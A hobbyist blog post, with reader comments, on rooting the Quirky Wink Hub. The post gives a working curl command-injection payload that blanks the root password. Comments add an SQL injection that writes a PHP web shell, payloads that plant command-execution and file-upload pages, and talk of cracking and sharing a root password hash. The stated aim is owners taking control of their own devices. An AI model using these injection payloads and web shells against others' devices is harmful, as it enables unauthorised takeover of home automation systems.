Rooting The Quirky Wink Hub

As you may know, the Quirky Wink Hub is an affordable Home Automation device containing the following radios:  WiFi, Bluetooth, ZigBee, Z-Wave, Lutron, and Kidde.  It operates using the Wink app and connecting through a cloud server.  It is sold at Home Depot and Amazon.

Well, that’s good but what if we want to take matters into our own hands?  The device is a nice little Freescale i.MX283 based Linux box that we can have some fun with, especially with all the radio support.

Luckily, the enterprising crew at GTVHacker has discovered a nice exploit that makes rooting this hardware quite easy: http://dc22.gtvhacker.com/index.php/Wink_Hub%E2%80%8B%E2%80%8B

This is briefly discussed at:  http://hackaday.com/2014/08/09/defcon-22-hack-all-the-things/

Unfortunately this is patched in the most recent update.  The set_dev_value.php file has been removed.  So be sure to do this before you have connected the hub to the internet.

But what about a how-to?

Let’s get to it:

Plug in your Quirky Wink Hub and connect to the default WiFi AP that it creates.

Using cURL or similar, send the following command to the lighttpd server to remove the root password:

curl "http://192.168.0.1/set_dev_value.php" -d "nodeId=a&attrId=;cp /etc/shadow /etc/shadow.bak;sed -i 's/root:.*:\(.*:.*:.*:.*:::\)/root::\1/' /etc/shadow;cat /etc/shadow;"

We should be able to access the shell now through the UART using a 3.3V TTL adapter.

If we don’t have the hardware to do that, there is another option.  You can use the tftp command to bring over a replacement rsa key file for dropbear which runs on the device by default or use another cURL command to append your public rsa key to the /root/.ssh/authorized_keys file.  Then you can access the device through SSH.  Or you can create a new php file to preserve the shell command access through the web server.

Now that we have access to the device, we can notice that there is a web interface available by default at /devices.php.  This allows us to view and control the home automation devices linked to the hub.  However the control part does not work since a file has been removed.  We can restore that function by editing the /var/www/set_dev_value.php file as follows:

$cmd = 'aprontest -u -m ' . $nodeId . ' -t ' . $attrId . ' -v ' . $v;

So we have a fully functional web interface to view and control the status of our connected devices.  We can use this as an API.

To add devices, we can do so using the aprontest binary which prints some nice help instructions when run with no arguments.

If we want to block the cloud connections and updates we can add the following entries to the hosts file:

127.0.0.1       hub-api.winkapp.com
127.0.0.1       hub-updates.winkapp.com
127.0.0.1       wink-hub-images.s3.amazonaws.com

Finally, we want to connect the hub as a client to our own WiFi network.  We can do so by POSTing the WiFi network information to the web server on the hub as follows:

curl "http://192.168.0.1/index.php" -d '{"ssid":"my_ssid","pass":"my_wifi_password"}'

As you can see the network parameters are just JSON encoded.

For some reason, these settings don’t seem to be saved to the database and persist through a reboot.  Possibly because we did not create a user account with a valid token.  So we can

cp /database/wpa_supplicant.conf /etc/

Then we can edit the /etc/init.d/S41wireless file to reflect the new location of wpa_supplicant.conf.

We can prevent these settings from being deleted if we have not created a wink account by doing:

touch /database/oauth

No, apparently the oauth file gets deleted if it is invalid so we need to edit /etc/init.d/S31platform to prevent it from deleting our wpa_supplicant.conf file.

Well, we should have a nice Quirky Wink Hub completely under our control now and ready to serve us faithfully without help from the cloud.

Advertisements

149 thoughts on “Rooting The Quirky Wink Hub

  1. I wonder if we can roll back the firmware at all, or if a new entry vector could be uncovered by downloading the firmware and unpacking it.

    Thoughts?

    Like

    • FYI, I was able to do all my work on the firmware on the hub itself.. mounting the ubi FS was a pain in the behind on a normal linux box (that’s what it uses.. UBIFS (a followup to JFFS2). Rolling back to an earlier firmware shouldn’t be an issue, though I’m not sure why you’d need to (at least not yet).

      Like

  2. I manually updated both of mine to the newest firmware. All I did was modify the upgrade/platform scripts, to just pull down the updater files, flashed them manually, modified the updater rootfs so it wouldn’t auto start upgrading, when it came back up, i ssh’d back in, manually pulled down the new uImage and rootfs, flashed them, mounted the new rootfs, copied back over my authorized_keys, fixed dropbear (to allow root), reedited /etc/hosts, and put back the php file (just in case). rebooted, both are running the newest image with access intact.

    Like

  3. Yes, Daniel B is correct. If you study the updater scripts you can definitely manually install firmware updates without too much trouble. Just be sure you don’t lock yourself out and for safety you may want to change the uboot timeout from 0 to 5 using fw_setenv.

    Like

  4. CentOS didn’t want to make UBI very easy, but then, this server is mainly for VMs. Either way.. The only oddball thing I’ve noticed is that the hub is very apt to drop the wifi link unless i leave a constant ping running on it, to ‘force the line active’.. it doesn’t seem to have a very good wifi antenna, considering where it is in relation to my AP. I do have the API address allowed though, so i can use the app with it (it can’t get updates though, that’s been neutered).

    Like

  5. I installed and updated my hub before finding these instructions – I assumed there was a local JSON interface available officially 🙂 Is there a way to revert the firmware once it has been updated? I am capable of soldering to the UART or JTAG pads if necessary, but maybe the bootoader looks for a local image over TFTP if the reset button is held, or there’s a Freescale flash utility I could use.

    Like

    • I doubt about the tftp bit.. though, you may not be out of luck now. After my first hub got updated before i worked out how to manually do it. (which btw, there’s no reason i can think of to revert the firmware as of yet, since once you’re in manual control of the updates, you can do manipulate any future updates. the UART will give you console access.. and as it turns out.. I have the root password.. yes.. you read that right.. Obviously, i’m not going to post it in here. that being said, I’m willing to help you out, offline of this wordpress.

      Like

  6. Whoa! I just checked back, and finally saw that comments were happening.

    I was playing around with my Hub a little bit and let it update because I found that the Wink API (http://docs.wink.apiary.io/) does have access to the Hub and items, it’s just not documented at all. I grabbed my authorization token by sniffing traffic between my iPhone and the Wink API server.

    I’m considering switching it out… just not sure if I’ll be able to get a non updated one. Also other than having local access, don’t know if I’ll really need it at this point since the commands can be sent through the API. Just have to keep poking around to see what commands work.

    Like

    • Yes good to see that support is developing on the cloud API including some hub references in the docs. Somewhat troubling that the credentials can be intercepted (without SSL MitM?).

      It seems very unlikely that factory updated units have made it to retail, but I guess it depends on the production schedule.

      Feel free to share your experiences with the cloud API.

      Like

  7. So, I apologize but I’m a total novice. Probably shouldn’t be attempting this. However, I am and wondered if anyone could help RE: “cURL command to append your public rsa key to the /root/.ssh/authorized_keys file”. I’ve done this. I’m able to read the file and see that indeed my rsa key is there. However, I’m still getting permission denied when trying to SSH in (using -i to point to my local private key). Any help would be greatly appreciated.

    While I’m bothering people, can I ask has anyone poked around with the Lutron radio? Will the same commands you can send to the RadioRA2 box work on the Wink Hub?

    Like

  8. First of all, thanks for putting this together. This is my first time rooting anything (unless you count flashing firmware on a WRT54G 10 years ago), I was able to remove the root password, setup SSH, and modify the hosts file and setup the wps_supplicant.conf file. But after I modified the S31platform file and rebooted the unit was bricked. The LED is solid pink and the AP is dead. My guess is that I make a mistake when I modified the S31platform. I have included it below. Does anyone know what I did wrong.

    #if [ ! -e /database/oauth ]; then
    # rm /database/wpa_supplicant.conf
    #fi

    if [ ! -e /database/wpa_supplicant.conf ]; then
    /root/wifi/run_ap.sh start
    fi

    Like

    • I managed to do the same thing. I am going to crack open the case, and log in via the UART. I have lots of 3.3 v to USB widgets here for Arduino programming, so this should be easy enough. I may even leave it attached, so when I brick it again…

      Like

      • So I connected to the terminal but am not getting a login. I can see the boot output, and it is different from what is found here https://www.dropbox.com/s/3g37fqe02d4tetd/boot.txt

        It looks like it is unable to find zwavetest file in /usr/sbin, the SQL queries in the Zigbee init are rejected, and it can’t read /root/.monit.id

        and it doesn’t appear that getty is starting, or at least it is not letting me login from the console. (This has not been updated so getty should still be active). I just keep getting a loop of IPC status messages.

        Whatever is not working, it is more than just a problem with my edit of S31platform. it seems like there is other files that are corrupt.

        Micheal, if you are able to connect, let me know what you find. Hopefully you are not in the same boat (maybe there is something wrong with my terminal).

        Also would the ethernet port be active? Since I already have the keys setup, i could still connect to dropbear with a physical connection. I don’t see any indication that an eth is being initialized from the boot script.

        Like

  9. So I got a bit over-excited and set up my new Wink Hub and ran an update.. Then I looked online and found this page.. D’oh!

    So, is there any way to revert back to older firmware? Or am I screwed and I should go exchange the hub?

    Any other injection possibilities? Has anyone sniffed the communication between the mobile app and the hub when its sending over the WiFi parameters?

    Like

    • So I had some thoughts.. Does the Wink hub have a script that checks a server if there are any updates? Could this be a possible way to inject a custom update image which would allow root access??

      Like

    • Been running JohntheRipper on the password hash for the last couple of days.. but unfortunately login over UART has been disabled in the latest FW (as posted above)

      If you can figure out a way for it to boot into the update partition, then all exploits are still available there..

      Like

      • 8. and there’s a space in the middle. Here’s a hint, since don’t want to put it in here, and have them (Wink) see it exposed… Google has an APP for taking notes. The name of that APP is the first part of it. (pw is all lowercase, app is emphasized for a reason..) If you can figure it out from this, give yourself a cookie.

        Like

  10. I’ve attached my usb-to-serial adapter to the uart port of a brand-new, hackable hub (the PHP script is intact) , but I don’t see any output. What’s the secret to get it to work?

    Like

  11. I created some server scripts and an Android app for controlling the wink hub on your local network. It’s pretty alpha, but it allows you to create groups of devices, scenes with presets for each device and write configurations to NFC tags. It only supports dimmable bulbs right now, but if there is interest, it’s easy to expand. https://github.com/nashira/blink

    Like

      • Found this solution:
        #13. One more last step before we disconnect, edit the following file,

        $vi /etc/init.d/S31platform

        and look for the following lines,

        if [ ! -e /database/oauth ]; then
        rm /database/wpa_supplicant.conf
        fi

        and edit the rm /database/wpa_supplicant.conf to rm /database/wpa_supplicant.conf1. I tried commenting the line but ran into issue. So i end up adding a 1 at the end, since the file anyway won’t be there.

        Like

      • I actually signed up for a wink account before realizing that all commands would be routed through wink’s servers so I created a log in, but blocked the updates host before the hub had a chance to update.

        Like

    • Nash, I’m looking to send commands to the Hub directly by running scripts on the a Linux box (RaspPi). If you can give us some pointers on how to run commands to turn bulbs on/off and change brightness?

      Thanks for your work!

      Liked by 1 person

      • For the Android app I just use `aprontest -u -m -t -v `. That has to be run on the hub itself. It looks like aprond opens a socket to the wink api, I’d really like to know more about how that works.

        Like

  12. I’m trying to avoid having to use the UART to be able to login, and I issued this command to modify the authorized_keys file:
    curl “http://192.168.0.1/set_dev_value.php” -d “nodeId=a&attrId=; echo ‘rsa text’ >> .ssh/authorized_keys;”

    The file looks ok as there is now two keys on the authorized_keys file, but I’m still unable to login via ssh… is there a way to turn on telnet or something instead?

    Like

  13. 3 questions:
    1. i’ve rooted my wink; does this mean it wont connect to the cloud for accessing the normal UI in the app itself? i know we’re blocking the firmware updates..but can the wink be used as before, only with root access now?

    2. is there a way to ensure future firmware updates won’t remove your root password? or is there always the possibility a future update will erase root access?

    3. i think i figured out the the original admin password – can you email me at mcoder AT gmail and tell me what it is?

    Like

  14. oh and i’ll be happy to help out the other poster who built the android app..i see alot of potential in that ‘blink’ app for those who want a complete ‘local’ solution if you can add/name devices that way.

    Like

    • Cool deal.. I must have missed about the app… yeah.. i have 2 hubs.. (i always get 2 of something, so i have a backup, when it’s something i’m going to hack on)…. I probably won’t really use the wink stuff for it’s purpose, since i have an Almond+. lol

      Like

      • I’d like to find a way to send API commands directly to the Wink by running a script. It looks like the Android app might shed some light on how to do this. If anyone comes up with something, I’d be interested.

        I also would like the original admin password if you please. starwarsasdf at gmail.

        Like

    • One fairly easy feature I’m thinking about implementing is using the command injection exploit to install the server scripts right from the app, for a one-click experience. And the app doesn’t modify the system in a way that would interfere with using the wink app over the internet, so you can use both together. Also I think the wink api is pretty well documented, so it may be possible to build that into Blink too. Let me know what features your are interested in for prioritization. I’ve added the ability to rename devices, and I’ll add the ability to add and remove them tomorrow.

      Liked by 1 person

      • Nash that’s awesome!! Yes that would be really slick. You’re on to something making your app work locally if wink is down or allowing use of the wink hub as normal.

        What can we do to help? I think your little app here might suddenly take off!

        Like

      • One last question.. Is it possible to get the app to install the neutered firmware since the current wink app won’t allow you to add devices if your hub isn’t running the current firmware?

        Like

      • Nash, thanks much for your work on this. I’ve had nothing but problems with the cloud app working intermittently. As of now my devices show on devices.php but not in the Wink app- they are completely unresponsive and need to be removed manually for it to even detect them. Can’t wait to bin this for a local solution.

        Like

  15. I keep getting this when I try to enter in my SSID and password –

    Slim Application Errorbody{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}Slim Application ErrorThe application could not run because of the following error:DetailsType: ErrorExceptionCode: 8Message: Trying to get property of non-objectFile: /var/www/index.phpLine: 54Trace

    #0 /var/www/index.php(54): Slim\Slim::handleErrors(8, 'Trying to get p...', '/var/www/index....', 54, Array)
    #1 [internal function]: {closure}()
    #2 /var/www/Slim/Route.php(462): call_user_func_array(Object(Closure), Array)
    #3 /var/www/Slim/Slim.php(1326): Slim\Route->dispatch()
    #4 /var/www/Slim/Middleware/Flash.php(85): Slim\Slim->call()
    #5 /var/www/Slim/Middleware/MethodOverride.php(92): Slim\Middleware\Flash->call()
    #6 /var/www/Slim/Middleware/PrettyExceptions.php(67): Slim\Middleware\MethodOverride->call()
    #7 /var/www/Slim/Slim.php(1271): Slim\Middleware\PrettyExceptions->call()
    #8 /var/www/index.php(81): Slim\Slim->run()
    #9 {main}

    [1/2]: “ssid”:”ydkfl”’
    curl “http://192.168.0.1/index.php” -d ”pass”:”QDXMJV24WJKCTBGV”’ –>
    –_curl_–“ssid”:”ydkfl”’
    curl “http://192.168.0.1/index.php” -d ”pass”:”QDXMJV24WJKCTBGV”’
    curl: (6) Could not resolve host: “ssid”

    [2/2]: ”pass”:”QDXMJV24WJKCTBGV”’
    curl “http://192.168.0.1/index.php” -d ”pass”:”QDXMJV24WJKCTBGV”’ –>
    –_curl_–”pass”:”QDXMJV24WJKCTBGV”’
    curl “http://192.168.0.1/index.php” -d ”pass”:”QDXMJV24WJKCTBGV”’
    curl: (6) Could not resolve host: ”pass”

    Like

  16. FYI, received Home Depot wink on 12/2/2014… I was able to root by curl adding the RSA key from a windows box using windows curl.exe. Note that the + signs in the public key turn into spaces if you’re not careful. I replaced the +s with %%2b which translates to a + and all was well. Now to figure out how to get an iPhone app talking directly to a rooted wink hub…

    Liked by 1 person

  17. There is a SQL injection vulnerability in dev_detail.php. The id parameter get’s passed directly into the query via POST:

    function buildDeviceDetail($dev_id)
    {
    $info = "";
    $attrs = "";
    $values = "";
    $result = null;
    $query = "SELECT interconnect,userName FROM masterDevice WHERE deviceId='" . $dev_id . "';";
    $row = db_fetch_row($query);
    ...
    }

    $dev_id = $_POST['id'];
    //$prot = $_POST['prot'];
    //$type = $_POST['type'];
    buildDeviceDetail($dev_id, $prot, $type);

    I'm not the best with SQL injection and I'm still playing with it, but it may be another possibility to get back in for those who updated.

    Liked by 1 person

  18. It looks like the .shell command is disabled in sqlite, but .output is enabled so a carefully crafted sql injection exploit should be able to create a new php file that enables shell execution.

    Like

      • Can you do a test for me? I’ve worked out how to create a php file using the SQL injection, but I haven’t been able to get the content right. But just to make sure the injection vulnerability still exists on the updated hub can you try this:

        curl -d id="1 or 1=1';ATTACH DATABASE '/var/www/lol.php' AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES ('';--" http://192.168.0.1/dev_detail.php

        Then tell me what you get when you access http://192.168.0.1/lol.php?cmd

        Like

      • Hmmm. It seems wordpress is stripping out the interesting bits between the single quotes after

        VALUES (

        in the above command. Probably misinterprets it as an attempt at cross site scripting. Bummer. I’ll see if there’s another way to post it here… But the command as it appears will still be sufficient to tell me if it’s creating the php file or not, so please still try it, and I’ll keep working on getting the right content.

        Like

      • Oh, I should add that if for some reason the first step gets screwed up and the database isn’t written correctly there’s no way to drop the database via SQL commands in sqlite and it won’t be updated by rerunning the script. You’ll need to either change the sql_cmd.php filename to something else or modify the script so it doesn’t error out trying to create an already existing database.

        Like

      • Eureka! I’ve pwned the patched wink hub using a SQL injection! It remains to be seen whether or not I can post the actual exploit here, I may have to post it elsewhere then link back to this.

        But–if you lost root by updating incorrectly, you’ll be able to get back in very shorty… Trust me, it’s easier than the process of safely updating!

        Like

  19. for those still have unpatched hub, i’ve written a web based cmd, so it’s easier to play around if you have not yet set ssh access
    curl “http://192.168.0.1/set_dev_value.php” -d “nodeId=a&attrId=;echo ‘<input type=\"text\" name=\"command\"/value=\"\”><?php if(isset(\$command)){\$cmd = \"sudo \" . dirname(__FILE__) . \"/php2apron set_value a ;\" . \$command;\$o=exec(\$cmd,\$output,\$retval); print \$command . \"\”; print \$cmd . \”\”; print \$o . \”\”; print \”retval:\” . \$retval . \”\”;print \”\”; foreach (\$output as \$line) { echo \$line.\”\n\”; } print \”\”;}?>’ > /var/www/cmd.php”

    Then go to your browser to access it
    http://192.168.0.1/cmd.php

    Like

    • for easy uploading of files, i’ve written upload.html and upload.php
      curl “http://192.168.0.1/set_dev_value.php” -d “nodeId=a&attrId=;echo ‘Select image to upload:’ > /var/www/upload.html”

      curl “http://192.168.0.1/set_dev_value.php” -d “nodeId=a&attrId=;echo ‘<?php \$target_dir = \"/var/www/\"; \$target_file = \$target_dir . basename(\$_FILES[\"fileToUpload\"][\"name\"]); \$uploadOk = 1; \$imageFileType = pathinfo(\$target_file,PATHINFO_EXTENSION); \$move = move_uploaded_file(\$_FILES[\"fileToUpload\"][\"tmp_name\"], \$target_file); print \"

      \"; var_dump(\$move); var_dump(\$_FILES); ?>' > /var/www/upload.php"
      
      go to your browser an access it
      http://192.168.0.1/upload.html
      
      enjoy! :)
      

      Like

  20. Daniel – can you specify which server or server(s) we block access to and still be able to use the mobile app?

    Any chance of you doing a detailed write-up of how to manual update the firmware without losing root?

    Thanks

    Like

  21. I’ve got the hub rooted and wireless running. I can also pair with the GE bulb. I can’t seem to control the bulb however. When I try to send an aprontest command it seems to go through and I can see the values updated with an aprontest -l -m1 but nothing actually happens to the bulb itself. What gives? Also, is it possible to hook the hub to the cloud AFTER I’ve already paired it with my wifi? The phone app at this point can’t seem to do it because it’s still assuming its directly connected to the hub. I’d rather not have to do any OAUTH token sniffing…

    Like

    • Nabors says how to reconnect. Yes, you have to delete the wpa_supplicant and restart it so it goes back to default. The hub doesn’t update by itself (you’ll see an update button at the bottom of the App, don’t press it or block the image IP addresses as already illustrated). You can connect and control stuff through the App. You also don’t have to sniff any oauth tokens, they’re in /database/oauth, but they’re useless unless you want (for some reason) to connect to the wink cloud services on your own. The real point of rooting is to take the wink cloud out of the loop.

      With regard to your bulb, are you trying to turn them on or off? If you’re having trouble turning them on can you turn them on manually (they default to on when you turn off the light switch for a bit then turn the light switch back on). And are you sure the light switch is on? 😉

      Like

      • Haha yes, the light switch method works just fine 🙂 I’m trying to use aprontest to control the brightness and power while the bulb is “on” (aka light switch is on). I can run the update command but nothing is happening with the bulb.

        Like

  22. I left the hub-api.winkapp.com out of the host file and deleted the file as suggested. The app was able to connect to the hub, but I can’t now connect devices. Once I select Link Light Bulb – it won’t let me click NEXT. The Hub Update Required is at the bottom like Kent says. Is it possible that the app is blocked from adding devices if there is an update needed?

    Like

    • Most likely, yes. That wouldn’t be that hard for them to do, and would actually be smart, if there was a critical enough bug, that way forcing the update. There’s nothing that says you can’t do a manual update, however.

      Like

  23. daniel, can you confirm what update is necessary (version and where its at?) and if manually installing it removes root? just trying to understand if there’s more than one file that gets updated with the firmware and if you can omit the files that remove your password.

    Like

    • Manually installing will never ‘remove root’.. well, not really, because you’re in control of the update process, as it were. As for version, etc.. I’d have to see.. but basically, the update gets pulled down after it’s flashed and rebooted to the ‘updater’ partition.. the updater is just a bootstrapper, it doesn’t contain the actual update (so updating is actually 2 steps, when the system does it by itself)

      Like

  24. The manual update procedure in the link above is not detailed enough for me to be able to complete confidently. I would be worried about bricking. It is also dated back to Sept.
    It says “So far only the application rootfs has been updated…” is this still true?
    Also ” At this time the update is small enough that we can download it to /tmp and flash it using:
    ubiformat /dev/mtd5 -f /tmp/app-rootfs.ubi ” Is this still true?

    Like

    • I didn’t use the above link, i did my manual update simply by looking through the update scripts and modifying them to remove anything harmful and then letting them run. (just to avoid mass cut and pasting) I’ll try and get some time tonight to take a look at the current update stuff.

      Like

  25. A work around is to install an older version of the wink app 2.0.3.5, then add all appliances, then update the phone app. Not ideal but it works. Lights work anyway.

    Something else I noticed is the app is trying to send me an email to confirm I am “a real person” and the email is not going out. Maybe blocking the other servers is causing this. Would this affect the robot emails going out. Not sure if robots will work at all, more testing.

    Like

  26. what are the facets of this so far:
    1. possible a sql exploit can restore root to an updated hub?
    2. wink-api needs to be removed from your hosts file in order to connect to phone app
    3. older version (downloaded from apk_downloader.org site) required to set up devices for now since the latest wink phone app does a firmrware check prior to allowing devices to be added.
    4. possible manual firmware update does not lose root, so maybe #3 isn’t required if the manual update process is working properly?
    5. some tools have been built by a couple of posters here to make the root process easier..do we have a step-by-step for them yet to use as a guide?
    6.

    Like

    • Yes. I haven’t had issues adding devices on my hacked, manually-updated hub.

      The way I did it was mostly using the instructions here:
      1. mount update partition
      2. modify partition (ssh access, remove or change root password, edit S99local script so update doesn’t start automatically)
      3.modify DO_UPDATE and reboot
      4. edit upgrade scripts ( I just modified them to not reboot after they are done. So It’s able to run through the whole automatic process, and then just stop)
      5. run update script
      6, mount app partition
      7. modify app partition to re-enable ssh, change/remove ssh password, run console on UART, etc.
      8. modify DO_UPDATE to boot to app partition
      9. reboot and hope for the best!

      Like

    • I attempted the manual upgrade but now my Wink may be bricked.
      It’s only showing a green light.
      Do you think I can still recovery if I had UART?

      Like

      • I had the same issue after I upgraded. It turns out that setting 5 to the bootload wait time would cause it to hang unless I had a UART conencted. I changed it to 2 (or 3 i dont remember now) and it boots fine now. Try that if you have access to a UART

        Like

  27. Daniel, what did you need to do for dropbear when manually updating? I’ve updated a unit and retained root but didn’t find a need to edit anything there.

    Like

    • i modified the startup parameters so that it allows access via password. I also changed the root password.

      Just make sure that dropbear is set to start and you should be ok.

      Like

  28. This is odd. I’m using CP2101 chipset UART (not sure if there’s an issue with this dongle). I can’t get output out of it. When i have the serial connected. I hit enter and the Wink HUB boots and everything is good, but still not output from serial.
    When I allow it to boot on it’s own without the UART connected, it just sits there with solid green light.
    Is it the bootloader interactive?
    Also, is the CP2101 UART compatible.

    Like

    • What did you set the boot_wait parameter to?

      I uses a raspberry pi as my uart interface.

      What parameters are you using for the uart? which pins are connected?

      Like

  29. quick question..can you set up the hub as normal and simply elect to not upgrade it and be able to root it later on? i know some folks who are not very technical that are sitting on their hubs in hopes of a more refined rooting process who would like to play with it in the interim.

    Like

  30. On my Android app, it bugged me about upgrading and wouldn’t let me add anything without updating. The slickdeals site above has links and info to real simple rooting and a post on an easy updating the hub after rooting.

    Like

  31. working exploit:
    curl -d id="1 or 1=1';ATTACH DATABASE '/var/www/exploit.php' AS lol; CREATE TABLE lol.pwn (t TEXT); INSERT INTO lol.pwn (t) VALUES ('');--" http://10.0.0.88/dev_detail.php

    Like

      • Well, there’s the conundrum, huh. If it’s posted, even obfuscated, they’ll know what to patch. If I keep it to myself I can keep exploiting my hubs but nobody else gets the benefit…

        Like

      • I know.. and I agree. It’s always a tricky game of cat and mouse. I’ve dealt with too many platforms like this with having to deal with this sort of ‘issue’. Matter of fact, right now i’m having to poke at raw memory because the manufacturer of this quad video encoder card wants $250 to fix a card that their firmware update trashed.. so out came the jtag, etc.. (because they won’t give out the root pw)

        Like

  32. Nope, sadly the wordpress mechanisms on this site are stripping out the key parts of the sql injection attack. I’ll post somewhere else shortly and add a link here.

    Like

  33. curl -d id="1 or 1=1';ATTACH DATABASE '/var/www/exploit.php' AS lol; CREATE TABLE lol.pwn (t TEXT); INSERT INTO lol.pwn (t) VALUES ('');--" http://10.0.0.88/dev_detail.php

    Like

  34. I posted a how to using sql injection on pastebin last night, but for some reason both my comments with pastebin links have been moderated out, leaving only one nonsensical follow up above since the previous post never showed up. What gives?

    Like

  35. Well let’s try this again…no link, just copy and paste the urls.
    Run the following via curl (escaped for curl in windows, linux users might have to modify)

    pastebin.com/hL02F3Vv

    With that you can now run arbitrary commands at sql_cmd.php?cmd=cmd_goes_here, and we’ll use that to add some more convenient php pages as suggested by cyber01. Just enter the text in the following pastebins in your browser:

    pastebin.com/0Hjn5wcN
    pastebin.com/KZhdserd

    Now you can go to upload.php and cmd.php and use them as you see fit.

    Like

    • thx Rezurok and others.
      I didn’t get your posted curls to run from a remote unix box, nor from root on the winkhub.
      Seemed to be a permission issue in the first case.
      Winkhub didn’t know echo.
      I instead went into /var/www/ with root and vi’d my way to creating upload.php and upload.php.
      Good idea and tools for future use..

      Like

    • I’ll actually have to modify the scripts and post.. I had forgotten, I just saved the original scripts off, and modified the commands /picked/chose as I went.

      Like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s